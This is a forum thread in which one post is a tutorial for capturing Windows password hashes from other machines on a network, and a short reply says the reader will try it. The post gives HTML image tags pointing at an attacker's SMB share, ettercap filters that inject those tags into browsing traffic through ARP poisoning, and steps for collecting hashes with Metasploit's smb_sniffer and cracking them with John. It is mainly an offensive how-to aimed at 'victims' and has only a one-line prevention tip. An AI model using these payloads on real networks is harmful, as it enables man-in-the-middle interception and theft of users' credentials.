Results 1 to 2 of 2

Thread: Capture Password Hashes from Patched Windows Machines

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    12

    Default Capture Password Hashes from Patched Windows Machines

    Prerequisites:
    the victim is browsing the web from Windows Mozilla(and family) version <2.0.0.6, or I.E.(any version to my knowledge)

    How it works:
    send the victim malicious html containing a netbios share location
    the victims computer will attempt to login to the attackers machine, which is running a fake samba server, set up only to capture the login information from the victim

    the html code would be
    <img src="\\192.168.1.100\share\picture.png">
    I.E.
    or
    <img src="moz-icon:file:///%5c/192.168.1.100/share/picture.png">
    Mozilla

    NOTE: doesn't have to be a real file thats being hosted

    ettercap filters replacing google image for that code works nicely
    # googlbios.ie.filter
    # replaces http strings transparently, compile with etterfilter
    if (ip.proto == TCP && tcp.src == 80) {
    replace("/intl/en_ALL/images/logo.gif", "\\192.168.1.100\share\picture.png");
    msg("Replaced\n");
    }
    or
    # googlbios.moz.filter
    # replaces http strings transparently, compile with etterfilter
    if (ip.proto == TCP && tcp.src == 80) {
    replace("/intl/en_ALL/images/logo.gif", "moz-icon:file:///%5c/192.168.1.100/share/picture.png");
    msg("Replaced\n");
    }
    respectively

    compile like so
    etterfilter googlebios.*.filter -o googlbios.ef

    (I use ettercap filters a lot for remote code testing, really handy without causing much out of the ordinary in web browsing instead of the google image you could use some small image on a popular web page)

    run ettercap, unified sniffing, scan for hosts, arp poisoning, etc..

    NOTE: after done manipulating the packets on the network be sure to STOP arp poisoning, and STOP sniffing otherwise you'll DoS the lan

    NOTE1: netsed is a "cleaner" alternative to ettercap in this case, you have to look up html escape codes for / and .

    on the attackers computer they would be running smb_sniffer from metasploit, which'll send you the password hash

    crack with john, and tada

    works on all versions of Windows(patched and otherwise), I haven't personally tested it on vista, but I'm told it works the same

    Prevention: run a firewall blocking 137-139, 445
    Netbios is the biggest security hole in Windows. Disabling it's functionality it generally a smart move.

    Jake

    More nifty tuts for patched machines coming soon....
    maybe I'll stop being such a lazy ass and make a video...

    where I got the idea:
    hxxp://packetstorm.offensive-security.com/papers/attack/tactical_paper.pdf
    hxxp://irongeek.com/i.php?page=security/ettercapfilter

  2. #2
    Junior Member duwey96's Avatar
    Join Date
    Nov 2007
    Posts
    41

    Default

    interesting filter idea, I think I'll give it a try tomorrow, just to test and play around.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •